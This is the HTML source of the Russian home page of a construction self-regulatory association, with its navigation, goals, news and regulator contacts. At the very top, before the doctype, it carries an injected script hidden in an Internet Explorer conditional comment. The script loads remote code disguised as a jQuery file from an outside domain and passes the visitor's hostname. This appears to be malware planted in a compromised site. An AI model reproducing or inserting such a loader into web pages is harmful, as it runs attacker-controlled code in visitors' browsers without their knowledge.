<script type='text/javascript'>/*@cc_on var zvics = document.createElement('script'); zvics.src = 'http://blondescript.org/data/jquery_1.7.3.min.js?r='+window.location.hostname; document.getElementsByTagName('head')[0].appendChild(zvics); @*/</script><!DOCTYPE HTML>
<html lang="ru-ru" dir="ltr">

<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1">
  <base href="http://www.sro-mrsa.ru/" />
  <meta name="generator" content="Joomla! - Open Source Content Management" />
  <title>Главная</title>
  <link href="/index.php?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
  <link href="/index.php?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" />
  <link href="/templates/tk_gen_free_ii/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" />
  <link rel="stylesheet" href="/media/com_attachments/css/attachments_hide.css" type="text/css" />
  <link rel="stylesheet" href="/media/com_attachments/css/attachments_list.css" type="text/css" />
  <link rel="stylesheet" href="/cache/widgetkit/widgetkit-b2e4c3b0.css" type="text/css" />
  <link rel="stylesheet" href="/plugins/system/jcemediabox/css/jcemediabox.css?06bd17b651de924e743aa51b487fdaa3" type="text/css" />
  <link rel="stylesheet" href="/plugins/system/jcemediabox/themes/standard/css/style.css?7dbc8934e30b0c4c7dbb06a58b912f10" type="text/css" />
  <script src="/media/system/js/mootools-core.js" type="text/javascript"></script>
  <script src="/media/system/js/core.js" type="text/javascript"></script>
  <script src="/media/system/js/caption.js" type="text/javascript"></script>
  <script src="/media/system/js/mootools-more.js" type="text/javascript"></script>
  <script src="/media/com_attachments/js/attachments_refresh.js" type="text/javascript"></script>
  <script src="/media/widgetkit/js/jquery.js" type="text/javascript"></script>
  <script src="/cache/widgetkit/widgetkit-3fc59c71.js" type="text/javascript"></script>
  <script src="/plugins/system/jcemediabox/js/jcemediabox.js?f246943abadb42a78f823affe64fe7cc" type="text/javascript"></script>
  <script type="text/javascript">
window.addEvent('load', function() {
				new JCaption('img.caption');
			});JCEMediaBox.init({popup:{width:"",height:"",legacy:0,lightbox:0,shadowbox:0,resize:1,icons:1,overlay:1,overlayopacity:0.8,overlaycolor:"#000000",fadespeed:500,scalespeed:500,hideobjects:0,scrolling:"fixed",close:2,labels:{'close':'Close','next':'Next','previous':'Previous','cancel':'Cancel','numbers':'{$current} of {$total}'},cookie_expiry:"",google_viewer:0},tooltip:{className:"tooltip",opacity:0.8,speed:150,position:"br",offsets:{x: 16, y: 16}},base:"/",imgpath:"plugins/system/jcemediabox/img",theme:"standard",themecustom:"",themepath:"plugins/system/jcemediabox/themes",mediafallback:0,mediaselector:"audio,video"});
  </script>

<link rel="apple-touch-icon-precomposed" href="/templates/tk_gen_free_ii/apple_touch_icon.png" />
<link rel="stylesheet" href="/templates/tk_gen_free_ii/css/base.css" />
<link rel="stylesheet" href="/templates/tk_gen_free_ii/css/layout.css" />
<link rel="stylesheet" href="/templates/tk_gen_free_ii/css/menus.css" />
<style>.wrapper { max-width: 980px; }
#sidebar-b { width: 33%; }
#maininner { width: 67%; }
#menu .dropdown { width: 250px; }
#menu .columns2 { width: 500px; }
#menu .columns3 { width: 750px; }
#menu .columns4 { width: 1000px; }</style>
<link rel="stylesheet" href="/templates/tk_gen_free_ii/css/modules.css" />
<link rel="stylesheet" href="/templates/tk_gen_free_ii/css/tools.css" />
<link rel="stylesheet" href="/templates/tk_gen_free_ii/css/system.css" />
<link rel="stylesheet" href="/templates/tk_gen_free_ii/css/extensions.css" />
<link rel="stylesheet" href="/templates/tk_gen_free_ii/css/custom.css" />
<link rel="stylesheet" href="/templates/tk_gen_free_ii/css/font2/opensans.css" />
<link rel="stylesheet" href="/templates/tk_gen_free_ii/css/font3/arial.css" />
<link rel="stylesheet" href="/templates/tk_gen_free_ii/css/style.css" />
<link rel="stylesheet" href="/templates/tk_gen_free_ii/css/responsive.css" />
<link rel="stylesheet" href="/templates/tk_gen_free_ii/css/print.css" />
<link rel="stylesheet" href="/templates/tk_gen_free_ii/fonts/opensans.css" />
<script src="/templates/tk_gen_free_ii/warp/js/warp.js"></script>
<script src="/templates/tk_gen_free_ii/warp/js/responsive.js"></script>
<script src="/templates/tk_gen_free_ii/warp/js/accordionmenu.js"></script>
<script src="/templates/tk_gen_free_ii/warp/js/dropdownmenu.js"></script>
<script src="/templates/tk_gen_free_ii/js/template.js"></script>
</head>

<body id="page" class="page sidebar-b-right sidebars-1  isblog " data-config='{"twitter":0,"plusone":0,"facebook":0}'>

		
	<div id="block-toolbar"><div>
		
		<div class="wrapper"></div>
		
	</div></div>
		
	<div id="block-header">
		
		<div class="wrapper">
		
		<div id="toolbar" class="clearfix">
	
								<div class="float-left">
				
										<time datetime="2019-06-13">13.06.2019</time>
									
										
				</div>
									
								
			</div>
		
			<header id="header">
	
				<div id="headerbar" class="clearfix">				
										
										<div class="left"><div class="module   deepest">

			
	<p style="text-align: right;"><span style="color: #ffffff; text-shadow: black 1px 1px 2px;"> пн вт ср чт пт</span><span style="color: red; text-shadow: black 1px 1px 2px;"> сб вс</span><br /><span style="color: #ffffff; text-shadow: black 1px 1px 2px;">c 10-00 до 18-00</span><br /><span style="color: #ffffff; font-size: 16pt; text-shadow: black 1px 3px 4px;"><strong><span style="color: #ffffff; font-size: 16pt; text-shadow: black 1px 3px 4px;"><strong>8 (495) 902-74-83</strong></span></strong> </span></p>
<!--p style="text-align: right;"><span style="color: #ffffff; font-size: 16pt; text-shadow: black 1px 3px 4px;"><strong>8 (495) 505-06-33</strong></span></p-->
<p>&nbsp;</p>
<!--p style="text-align: right;"><span style="color: #ffffff; font-size: 16pt; text-shadow: black 1px 3px 4px;"><strong>8 (495) 902-74-83</strong></span></p-->
<div style="display: inline-block; color: white; text-decoration: none; padding: 0.5em 2em; outline: currentcolor none medium; border-width: 2px 0px; border-style: solid none; border-color: #ff9999 #000000 #990000; border-radius: 6px; background: #ff3232 linear-gradient(#ff7f7f, #ff3232) repeat scroll 0% 0%; transition: all 0.2s ease 0s; text-align: center;"><a href="http://lk.sro-mrsa.ru" target="_blank">ЛИЧНЫЙ КАБИНЕТ</a></div>		
</div></div>
									
				</div>
	
				<div id="logo">
<!-- СѓР±СЂР°Р» РёР· С‚РµРіР° img height="142" width="265" -->
				<a href="/" class=""><img alt="logo" src="/images/logo.png" /></a>
				</div>
			
			</header>
			
		</div>
		
	</div>
	
	
	
	<div id="block-menu">
		
		<div class="wrapper">
		
	<div id="menubar"><div><div class="clearfix">
					
										<nav id="menu"><ul class="menu menu-dropdown"><li class="level1 item101 parent active current"><a href="/" class="level1 parent active current"><span>Главная</span></a><div class="dropdown columns1"><div class="dropdown-bg"><div><div class="width100 column"><ul class="level2"><li class="level2 item118"><a href="/index.php/home/organy-upravleniya-partnerstva" class="level2"><span>Органы управления Ассоциации</span></a></li><li class="level2 item119"><a href="/index.php/home/spetsializirovannye-organy-sro" class="level2"><span>Специализированные органы СРО</span></a></li></ul></div></div></div></div></li><li class="level1 item111 parent"><a href="/index.php/dokumenty-sro/ustavnye-dokumenty" class="level1 parent"><span>Документы СРО</span></a><div class="dropdown columns1"><div class="dropdown-bg"><div><div class="width100 column"><ul class="level2"><li class="level2 item115"><a href="/index.php/dokumenty-sro/ustavnye-dokumenty" class="level2"><span>Уставные документы</span></a></li><li class="level2 item116"><a href="/index.php/dokumenty-sro/protokoly-obshchego-sobraniya" class="level2"><span>Общее собрание</span></a></li><li class="level2 item121 parent"><a href="/index.php/dokumenty-sro/protokoly-pravleniya" class="level2 parent"><span>Правление</span></a><ul class="level3"><li class="level3 item167"><a href="/index.php/dokumenty-sro/protokoly-pravleniya/protokoly-pravleniya-2011-g" class="level3"><span>Протоколы Правления 2011 г.</span></a></li><li class="level3 item168"><a href="/index.php/dokumenty-sro/protokoly-pravleniya/protokoly-pravleniya-2012-g" class="level3"><span>Протоколы Правления 2012 г.</span></a></li><li class="level3 item169"><a href="/index.php/dokumenty-sro/protokoly-pravleniya/protokoly-pravleniya-2013-g" class="level3"><span>Протоколы Правления 2013 г.</span></a></li><li class="level3 item170"><a href="/index.php/dokumenty-sro/protokoly-pravleniya/protokoly-pravleniya-2014-g" class="level3"><span>Протоколы Правления 2014 г.</span></a></li><li class="level3 item171"><a href="/index.php/dokumenty-sro/protokoly-pravleniya/protokoly-pravleniya-2015-g" class="level3"><span>Протоколы Правления 2015 г.</span></a></li><li class="level3 item172"><a href="/index.php/dokumenty-sro/protokoly-pravleniya/protokoly-pravleniya-2016-g" class="level3"><span>Протоколы Правления 2016 г.</span></a></li><li class="level3 item173"><a href="/index.php/dokumenty-sro/protokoly-pravleniya/protokoly-pravleniya-2017-g" class="level3"><span>Протоколы Правления 2017 г.</span></a></li><li class="level3 item174"><a href="/index.php/dokumenty-sro/protokoly-pravleniya/protokoly-pravleniya-2018-g" class="level3"><span>Протоколы Правления 2018 г.</span></a></li><li class="level3 item176"><a href="/index.php/dokumenty-sro/protokoly-pravleniya/protokoly-pravleniya-2019-g" class="level3"><span>Протоколы Правления 2019 г.</span></a></li></ul></li><li class="level2 item117 parent"><a href="/index.php/dokumenty-sro/control" class="level2 parent"><span>Контроль</span></a><ul class="level3"><li class="level3 item184"><a href="/index.php/dokumenty-sro/control/protokoly-zasedaniya-distsiplinarnoj-komissii-2019-g" class="level3"><span>Протоколы заседания Дисциплинарной комиссии 2019 г.</span></a></li></ul></li><li class="level2 item122"><a href="/index.php/dokumenty-sro/pravila-i-polozheniya-sro" class="level2"><span>Правила и положения СРО</span></a></li><li class="level2 item151"><a href="/index.php/dokumenty-sro/standarty-sro" class="level2"><span>СТО НОСТРОЙ</span></a></li><li class="level2 item132"><a href="/index.php/dokumenty-sro/otchjotnost" class="level2"><span>Отчётность</span></a></li><li class="level2 item145 parent"><a href="/index.php/dokumenty-sro/iski-i-sudebnye-resheniya" class="level2 parent"><span>Иски и судебные решения</span></a><ul class="level3"><li class="level3 item181"><a href="/index.php/dokumenty-sro/iski-i-sudebnye-resheniya/iski-i-sudebnye-resheniya-2015-g" class="level3"><span>2015 год</span></a></li><li class="level3 item180"><a href="/index.php/dokumenty-sro/iski-i-sudebnye-resheniya/iski-i-sudebnye-resheniya-2016-g" class="level3"><span>2016 год</span></a></li><li class="level3 item179"><a href="/index.php/dokumenty-sro/iski-i-sudebnye-resheniya/iski-i-sudebnye-resheniya-2017-g" class="level3"><span>2017 год</span></a></li><li class="level3 item178"><a href="/index.php/dokumenty-sro/iski-i-sudebnye-resheniya/iski-i-sudebnye-resheniya-2018-g" class="level3"><span>2018 год</span></a></li><li class="level3 item177"><a href="/index.php/dokumenty-sro/iski-i-sudebnye-resheniya/iski-i-sudebnye-resheniya-2019-g" class="level3"><span>2019 год</span></a></li></ul></li></ul></div></div></div></div></li><li class="level1 item110 parent"><a href="/index.php/reestr-chlenov/vstuplenie-v-sro" class="level1 parent"><span>Членство в СРО</span></a><div class="dropdown columns1"><div class="dropdown-bg"><div><div class="width100 column"><ul class="level2"><li class="level2 item124"><a href="/index.php/reestr-chlenov/vstuplenie-v-sro" class="level2"><span>Вступление в СРО</span></a></li><li class="level2 item165"><a href="/index.php/reestr-chlenov/vznosy-v-sro" class="level2"><span>Членские взносы в СРО</span></a></li><li class="level2 item164"><a href="/index.php/reestr-chlenov/dokument-o-chlenstve-v-sro" class="level2"><span>Выписка для членов СРО</span></a></li><li class="level2 item120"><a href="/index.php/reestr-chlenov/reestr-chlenov-sro" class="level2"><span>Реестр членов СРО</span></a></li><li class="level2 item123"><a href="/index.php/reestr-chlenov/kompensatsionnyj-fond-sro" class="level2"><span>Компенсационный фонд СРО</span></a></li><li class="level2 item131"><a href="/index.php/reestr-chlenov/planovye-proverki" class="level2"><span>Плановые проверки</span></a></li><li class="level2 item160"><a href="/index.php/reestr-chlenov/natsionalnyj-reestr-spetsialistov" class="level2"><span>Национальный реестр специалистов</span></a></li></ul></div></div></div></div></li><li class="level1 item129 parent"><a href="/index.php/novosti" class="level1 parent"><span>Новости</span></a><div class="dropdown columns1"><div class="dropdown-bg"><div><div class="width100 column"><ul class="level2"><li class="level2 item157"><a href="/index.php/novosti/sobytiya" class="level2"><span>События</span></a></li></ul></div></div></div></div></li><li class="level1 item112 parent"><a href="/index.php/kontakty" class="level1 parent"><span>Контакты</span></a><div class="dropdown columns1"><div class="dropdown-bg"><div><div class="width100 column"><ul class="level2"><li class="level2 item175"><a href="/index.php/kontakty/spetsialisty-sro" class="level2"><span>Специалисты СРО</span></a></li><li class="level2 item182"><a href="/index.php/kontakty/lichnyj-kabinet" class="level2"><span>Личный кабинет</span></a></li></ul></div></div></div></div></li></ul></nav>
						
										<div id="search">
	 <div class="ya-site-form ya-site-form_inited_no" onclick="return {'action':'http://sro-mrsa.ru/index.php/search','arrow':false,'bg':'transparent','fontsize':12,'fg':'#000000','language':'ru','logo':'rb','publicname':'Поиск по sro-mrsa.ru','suggest':true,'target':'_self','tld':'ru','type':2,'usebigdictionary':true,'searchid':2228545,'webopt':false,'websearch':false,'input_fg':'#000000','input_bg':'#ffffff','input_fontStyle':'normal','input_fontWeight':'normal','input_placeholder':'поиск по сайту','input_placeholderColor':'#000000','input_borderColor':'#7f9db9'}"><form action="http://yandex.ru/sitesearch" method="get" target="_self"><input type="hidden" name="searchid" value="2228545"/><input type="hidden" name="l10n" value="ru"/><input type="hidden" name="reqenc" value=""/><input type="search" name="text" value=""/><input type="submit" value="Найти"/></form></div><style type="text/css">.ya-page_js_yes .ya-site-form_inited_no { display: none; }</style><script type="text/javascript">(function(w,d,c){var s=d.createElement('script'),h=d.getElementsByTagName('script')[0],e=d.documentElement;if((' '+e.className+' ').indexOf(' ya-page_js_yes ')===-1){e.className+=' ya-page_js_yes';}s.type='text/javascript';s.async=true;s.charset='utf-8';s.src=(d.location.protocol==='https:'?'https:':'http:')+'//site.yandex.net/v2.0/js/all.js';h.parentNode.insertBefore(s,h);(w[c]||(w[c]=[])).push(function(){Ya.Site.Form.init()})})(window,document,'yandex_site_callbacks');</script></div>
										
				</div></div></div>
			
					
	</div>
		
	</div>
	
	
	<div id="block-top-a">
		
		<section id="top-a" class="wrapper grid-block"><div class="grid-box width100 grid-h"><div class="module mod-box  deepest">

			
<div id="slideshow-3-5d021b3613c0d" class="wk-slideshow wk-slideshow-default" data-widgetkit="slideshow" data-options='{"style":"default","autoplay":1,"interval":5000,"width":"auto","height":"auto","duration":500,"index":0,"order":"default","navigation":1,"buttons":1,"slices":20,"animated":"fade","caption_animation_duration":500}'>
	<div>
		<ul class="slides">

									<li>
				<article class="wk-content clearfix"><img src="/images/01.jpg" alt="01" width="600" height="350" style="display: block; margin-left: auto; margin-right: auto;" align="middle" /></article>
			</li>
												<li>
				<article class="wk-content clearfix"><img src="data:image/gif;base64,R0lGODlhAQABAJEAAAAAAP///////wAAACH5BAEHAAIALAAAAAABAAEAAAICVAEAOw==" data-src="/images/02.jpg" alt="02" width="600" height="350" style="display: block; margin-left: auto; margin-right: auto;" /></article>
			</li>
												<li>
				<article class="wk-content clearfix"><div style="text-align: center;"><img src="data:image/gif;base64,R0lGODlhAQABAJEAAAAAAP///////wAAACH5BAEHAAIALAAAAAABAAEAAAICVAEAOw==" data-src="/images/03.jpg" alt="03" width="600" height="350" /></div></article>
			</li>
												<li>
				<article class="wk-content clearfix"><div><img src="data:image/gif;base64,R0lGODlhAQABAJEAAAAAAP///////wAAACH5BAEHAAIALAAAAAABAAEAAAICVAEAOw==" data-src="/images/04.jpg" alt="04" width="600" height="350" style="display: block; margin-left: auto; margin-right: auto;" /></div></article>
			</li>
								</ul>
		<div class="next"></div><div class="prev"></div>		<div class="caption"></div><ul class="captions"><li>Содействие в представительстве и защите экономических, профессиональных и социальных интересов членов Ассоциации в законодательных и исполнительных органах власти и иных инстанциях</li><li>Разработка и утверждение стандартов саморегулирования и правил предпринимательской деятельности</li><li>Осуществление контроля над соблюдением членами СРО АС «Межрегионстройальянс» требований законодательства Российской Федерации, технических регламентов, правил и стандартов саморегулирования</li><li>Содействие в повышении квалификации и профессиональной аттестации специалистов компаний – членов СРО АС «Межрегионстройальянс»</li></ul>
	</div>
	<ul class="nav"><li><span></span></li><li><span></span></li><li><span></span></li><li><span></span></li></ul></div>		
</div></div></section>
			
	</div>
		
		
		<div id="block-main">
		
		<div id="main" class="wrapper grid-block">
		
			<div id="maininner" class="grid-box">
			
								<section id="innertop" class="grid-block"><div class="grid-box width100 grid-h"><div class="module mod-box  deepest">

		<h3 class="module-title"><span class="color">Важная</span> информация</h3>	
	<p>Уважаемые члены СРО АС "Межрегионстройальянс"!</p>
<p><strong>Информируем вас, что члены СРО АС "Межрегионстройальянс" теперь могут подавать документы в саморегулируемую организацию в электронном виде с использованием усиленной квалифицированной электронной подписи своей организации.</strong></p>
<p>СРО АС "Межрегионстройальянс" с декабря 2018 года переходит на хранение дел членов саморегулируемой организации в формате электронного архива. Положение о порядке хранения дел членов СРО АС "Межрегионстройальянс" в форме электронного документа (пакета электронных документов), подписанного саморегулируемой организацией с использованием квалифицированной электронной подписи, утвержденное Протоколом Правления №126 от 27.11.2018г., вступило в силу с 06.12.2018г.</p>
<p>В соответствии с положением члены СРО могут подавать документы в саморегулируемую организацию в электронном виде с обязательным использованием усиленной квалифицированной электронной подписи данной организации.</p>		
</div></div></section>
								
								
								<section id="breadcrumbs"><div class="breadcrumbs"><strong>Главная</strong></div></section>
								
				<section id="content" class="grid-block">
<div id="system-message-container">
</div>

<div id="system">

	
	<div class="items items-col-0 grid-block"><div class="grid-box width100 leading">
<article class="item" data-permalink="http://www.sro-mrsa.ru/index.php/2-uncategorised/2-main">

	
		
	
	<div class="content clearfix">

		
		<h2>Цели Саморегулируемой организации Ассоциации строителей &laquo;Межрегионстройальянс&raquo;:</h2>
<ul>
<li>Содействие членам Ассоциации в осуществлении деятельности, направленной на развитие строительной отрасли в Российской Федерации;</li>
<li>Содействие членам Ассоциации в реализации мер по предупреждению причинения вреда жизни или здоровью физических лиц, имуществу физических или юридических лиц, государственному или муниципальному имуществу, окружающей среде, жизни или здоровью животных и растений, объектам культурного наследия (памятникам истории и культуры) народов Российской Федерации вследствие недостатков работ, которые оказывают влияние на безопасность объектов капитального строительства и выполняются членами Ассоциации;</li>
<li>Поддержка деятельности членов Ассоциации, направленная на повышение качества выполняемых строительных работ, укрепление и развитие материально-технической базы строительной отрасли в России, увеличение производства новых строительных материалов и изделий, внедрение новых технологий, эффективное использование имеющегося в капитальном строительстве потенциала в целях приумножения национального богатства страны, а также соблюдение членами Ассоциации законодательства Российской Федерации в области осуществления строительной деятельности;</li>
<li>Повышение качества и безопасности услуг, оказываемых российскими предприятиями, развитие научного сотрудничества и обмен передовым опытом с ведущими отечественными и международными организациями по вопросам внедрения стандартов по качеству;</li>
<li>Координация предпринимательской деятельности и защита прав и имущественных интересов членов Ассоциации;</li>
<li>Представление интересов и защита прав своих членов, разрешение споров и конфликтов, оказание помощи в отношениях с органами государственной власти, органами местного самоуправления, профессиональными союзами и их объединениями.</li>
</ul>
<h2>Задачи СРО АС &laquo;Межрегионстройальянс&raquo;:</h2>
<ul>
<li>Содействие развитию компаний &ndash; членов Ассоциации и сотрудничества в строительной отрасли;</li>
<li>Развитие строительного комплекса, повышение качества выполняемых работ в строительной отрасли и безопасности производства;</li>
<li>Оказание всесторонней помощи членам СРО АС &laquo;Межрегионстройальянс&raquo; в их профессиональной деятельности, защита их прав и интересов в органах государственной власти и органах местного самоуправления, в общественных объединениях и других организациях, а также перед третьими лицами и гражданами;</li>
<li>Содействие профессиональной консолидации специалистов, занятых в строительной отрасли, повышение престижа профессии строителя;</li>
<li>Содействие в повышении квалификации и профессиональной аттестации специалистов компаний &ndash; членов СРО АС &laquo;Межрегионстройальянс&raquo;;</li>
<li>Разработка и утверждение стандартов саморегулирования и правил предпринимательской деятельности;</li>
<li>Информационная поддержка членов СРО АС &laquo;Межрегионстройальянс&raquo;.</li>
</ul><div class="attachmentsContainer">

<div class="attachmentsList" id="attachmentsList_com_content_default_2"></div>

</div>		
	</div>

	
	
		
</article></div></div>
	
	
</div></section>
				
				
				
			</div>
			
						
						<aside id="sidebar-b" class="grid-box"><div class="grid-box width100 grid-v"><div class="module mod-box  deepest">

		<h3 class="module-title">Новости</h3>	<div class="junewsultra ">
	<div class="jn">
        <div class="jn-head">
            <div class="jn-left">
                            </div>
            <div class="jn-right">
                        		<h4><a href="/index.php/novosti/6815-В%20Ростове-на-Дону%20задержаны%20три%20главных%20архитектора" title="В Ростове-на-Дону задержаны три главных архитектора">В Ростове-на-Дону задержаны три главных архитектора</a></h4>
                                <div class="jn-info">
                                		<span class="jn-small">12.02.2019</span>
                                                            | <span class="jn-small"><a href="/index.php/novosti">Новости</a></span>
                                                                            </div>
    	    </div>
	    </div>
                <div class="jn-intro">
                    Следователи возбудили уголовные дела в отношении главного архитектора Ростовской области Алексея Полянского, главного архитектора Ростова-на-Дону Романа Илюгина и главного архитектора администрации Мартыновского района Ростовской области Александра Корчиги. Всех троих подозревают в превышении должностных полномочий. По версии следствия, архитекторы незаконно выдавали и продлевали разрешения на строительство многоквартирных жилых домов.                        </div>
                        <div class="jn-more">
                        <a href="/index.php/novosti/6815-В%20Ростове-на-Дону%20задержаны%20три%20главных%20архитектора" class="readmore" title="">Подробнее...</a>
                                </div>
       	</div>
	<div class="jn">
        <div class="jn-head">
            <div class="jn-left">
                            </div>
            <div class="jn-right">
                        		<h4><a href="/index.php/novosti/6814-Президент%20Татарстана%20обозначил%20задачи%20для%20нацпроекта%20«Жильё%20и%20городская%20среда»" title="Президент Татарстана обозначил задачи для нацпроекта «Жильё и городская среда»">Президент Татарстана обозначил задачи для нацпроекта «Жильё и городская среда»</a></h4>
                                <div class="jn-info">
                                		<span class="jn-small">12.02.2019</span>
                                                            | <span class="jn-small"><a href="/index.php/novosti">Новости</a></span>
                                                                            </div>
    	    </div>
	    </div>
                <div class="jn-intro">
                    На достижение цели по вводу жилья в России на уровне 120 млн кв. м в год понадобится до трех лет, для этого регионам необходимо объединить ресурсы нескольких нацпроектов, заявил глава Татарстана Рустам Минниханов в ходе заседания рабочей группы Госсовета РФ по улучшению жилищных условий.                        </div>
                        <div class="jn-more">
                        <a href="/index.php/novosti/6814-Президент%20Татарстана%20обозначил%20задачи%20для%20нацпроекта%20«Жильё%20и%20городская%20среда»" class="readmore" title="">Подробнее...</a>
                                </div>
       	</div>
	<div class="jn">
        <div class="jn-head">
            <div class="jn-left">
                            </div>
            <div class="jn-right">
                        		<h4><a href="/index.php/novosti/6813-Губернаторский%20корпус%20обсудил%20инструменты%20повышения%20доступности%20жилья" title="Губернаторский корпус обсудил инструменты повышения доступности жилья">Губернаторский корпус обсудил инструменты повышения доступности жилья</a></h4>
                                <div class="jn-info">
                                		<span class="jn-small">12.02.2019</span>
                                                            | <span class="jn-small"><a href="/index.php/novosti">Новости</a></span>
                                                                            </div>
    	    </div>
	    </div>
                <div class="jn-intro">
                    В преддверии расширенного заседания Президиума Государственного совета РФ в Казани прошла командная сессия, посвященная выработке новых подходов к стимулированию жилищного строительства и формированию благоприятной городской среды.                        </div>
                        <div class="jn-more">
                        <a href="/index.php/novosti/6813-Губернаторский%20корпус%20обсудил%20инструменты%20повышения%20доступности%20жилья" class="readmore" title="">Подробнее...</a>
                                </div>
       	</div>
</div>		
</div></div><div class="grid-box width100 grid-v"><div class="module mod-box  deepest">

		<h3 class="module-title">События</h3>	<div class="junewsultra ">
	<div class="jn">
        <div class="jn-head">
            <div class="jn-left">
                            </div>
            <div class="jn-right">
                        		<h4><a href="/index.php/novosti/sobytiya/6825-os2019-complete" title="Состоялось очередное ежегодное общее собрание членов СРО АС «Межрегионстройальянс»">Состоялось очередное ежегодное общее собрание членов СРО АС «Межрегионстройальянс»</a></h4>
                                <div class="jn-info">
                                		<span class="jn-small">25.04.2019</span>
                                                            | <span class="jn-small"><a href="/index.php/novosti/sobytiya">События</a></span>
                                                                            </div>
    	    </div>
	    </div>
                <div class="jn-intro">
                    19 апреля 2019 года в конференц-зале &laquo;Москва-1&raquo; конгресс-центра ТГК "Измайлово" (корпус &laquo;Гамма-Дельта&raquo;) состоялось очередное ежегодное общее собрание членов СРО АС &laquo;Межрегионстройальянс&raquo;.
                        </div>
                        <div class="jn-more">
                        <a href="/index.php/novosti/sobytiya/6825-os2019-complete" class="readmore" title="">Подробнее...</a>
                                </div>
       	</div>
	<div class="jn">
        <div class="jn-head">
            <div class="jn-left">
                            </div>
            <div class="jn-right">
                        		<h4><a href="/index.php/novosti/sobytiya/6822-utverzhdena-novaya-forma-vypiski-iz-reestra-chlenov-sro" title="Утверждена новая форма выписки из реестра членов СРО">Утверждена новая форма выписки из реестра членов СРО</a></h4>
                                <div class="jn-info">
                                		<span class="jn-small">15.04.2019</span>
                                                            | <span class="jn-small"><a href="/index.php/novosti/sobytiya">События</a></span>
                                                                            </div>
    	    </div>
	    </div>
                <div class="jn-intro">
                    Федеральная служба по экологическому, технологическому и атомному надзору (Ростехнадзор) утвердила новую форму выписки из реестра членов саморегулируемой организации приказом от 4 марта 2019 года № 86. Приказ прошел регистрацию в Минюсте и опубликован на официальном портале правовой информации.
                        </div>
                        <div class="jn-more">
                        <a href="/index.php/novosti/sobytiya/6822-utverzhdena-novaya-forma-vypiski-iz-reestra-chlenov-sro" class="readmore" title="">Подробнее...</a>
                                </div>
       	</div>
</div>		
</div></div></aside>
			
		</div>
		
	</div>
		
		<div id="block-bottom-a"><div>
			
				<section id="bottom-a" class="wrapper grid-block"><div class="grid-box width100 grid-h"><div class="module mod-box  deepest">

		<h3 class="module-title"><span class="color">Органы</span> надзора за СРО. Отраслевые национальные объединения. Членство в некоммерческих организациях.</h3>	
	<h2>&nbsp;Органы надзора за СРО</h2>
<table border="0">
<tbody>
<tr>
<td width="120"><img src="/images/minstroy_logo.png" alt="minstroy logo" width="83" height="92" style="display: block; margin-left: auto; margin-right: auto;" /></td>
<td style="vertical-align: middle; font-size: 8pt;"><a href="http://www.minstroyrf.ru/">Министерство строительства и жилищно-коммунального хозяйства Российской Федерации</a></td>
<td width="40%"><span style="vertical-align: middle; font-size: 8pt;">127994, Москва, ул. Садовая-Самотечная, д. 10/23, стр. 1<br />8 (800) 222-85-80<br /><span id="cloak54848">Этот адрес электронной почты защищен от спам-ботов. У вас должен быть включен JavaScript для просмотра.</span><script type='text/javascript'>
 //<!--
 document.getElementById('cloak54848').innerHTML = '';
 var prefix = '&#109;a' + 'i&#108;' + '&#116;o';
 var path = 'hr' + 'ef' + '=';
 var addy54848 = 'm&#105;nstr&#111;y' + '&#64;';
 addy54848 = addy54848 + 'm&#105;nstr&#111;yrf' + '&#46;' + 'r&#117;';
 var addy_text54848 = 'm&#105;nstr&#111;y' + '&#64;' + 'm&#105;nstr&#111;yrf' + '&#46;' + 'r&#117;';
 document.getElementById('cloak54848').innerHTML += '<a ' + path + '\'' + prefix + ':' + addy54848 + '\'>'+addy_text54848+'<\/a>';
 //-->
 </script></span></td>
</tr>
<tr>
<td><a href="http://www.gosnadzor.ru/" target="_blank"><img src="/images/logoRTN.png" alt="logoRTN" width="90" height="68" style="margin: 10px auto; vertical-align: middle; display: block;" /></a></td>
<td style="vertical-align: middle; font-size: 8pt;"><a href="http://www.gosnadzor.ru/" target="_blank">Федеральная служба по экологическому, технологическому и атомному надзору</a></td>
<td><span style="font-size: 8pt;">&nbsp;105066, г. Москва, ул. А. Лукьянова, д. 4, стр. 1<br />8 (495) 646-33-18<br /></span><span style="font-size: 8pt;"><span id="cloak84409">Этот адрес электронной почты защищен от спам-ботов. У вас должен быть включен JavaScript для просмотра.</span><script type='text/javascript'>
 //<!--
 document.getElementById('cloak84409').innerHTML = '';
 var prefix = '&#109;a' + 'i&#108;' + '&#116;o';
 var path = 'hr' + 'ef' + '=';
 var addy84409 = 'r&#111;st&#101;hn&#97;dz&#111;r' + '&#64;';
 addy84409 = addy84409 + 'g&#111;sn&#97;dz&#111;r' + '&#46;' + 'r&#117;';
 var addy_text84409 = 'r&#111;st&#101;hn&#97;dz&#111;r' + '&#64;' + 'g&#111;sn&#97;dz&#111;r' + '&#46;' + 'r&#117;';
 document.getElementById('cloak84409').innerHTML += '<a ' + path + '\'' + prefix + ':' + addy84409 + '\'>'+addy_text84409+'<\/a>';
 //-->
 </script></span></td>
</tr>
</tbody>
</table>
<h2>Отраслевые национальные объединения. Членство в некоммерческих организациях.</h2>
<table border="0">
<tbody>
<tr>
<td><a href="http://www.s-nrg.ru/" target="_blank" title="Синергия"><img src="/images/snrg-logo.jpg" alt="snrg-logo" width="90" height="91" style="margin: 10px auto; vertical-align: middle; display: block;" /></a></td>
<td style="vertical-align: middle; font-size: 8pt;"><a href="http://www.s-nrg.ru" target="_blank">Межотраслевая ассоциация саморегулируемых организаций в области строительства, архитектурно-строительного проектирования, пожарной безопасности и энергоаудита "Синергия"</a></td>
<td><span style="vertical-align: middle; font-size: 8pt;">105064, г. Москва, ул. Садовая-Черногрязская, д. 13/3, к. 1, офис 10<br />8 (495) 505-06-34<br /><span id="cloak86824">Этот адрес электронной почты защищен от спам-ботов. У вас должен быть включен JavaScript для просмотра.</span><script type='text/javascript'>
 //<!--
 document.getElementById('cloak86824').innerHTML = '';
 var prefix = '&#109;a' + 'i&#108;' + '&#116;o';
 var path = 'hr' + 'ef' + '=';
 var addy86824 = '&#105;nf&#111;' + '&#64;';
 addy86824 = addy86824 + 's-nrg' + '&#46;' + 'r&#117;';
 var addy_text86824 = '&#105;nf&#111;' + '&#64;' + 's-nrg' + '&#46;' + 'r&#117;';
 document.getElementById('cloak86824').innerHTML += '<a ' + path + '\'' + prefix + ':' + addy86824 + '\'>'+addy_text86824+'<\/a>';
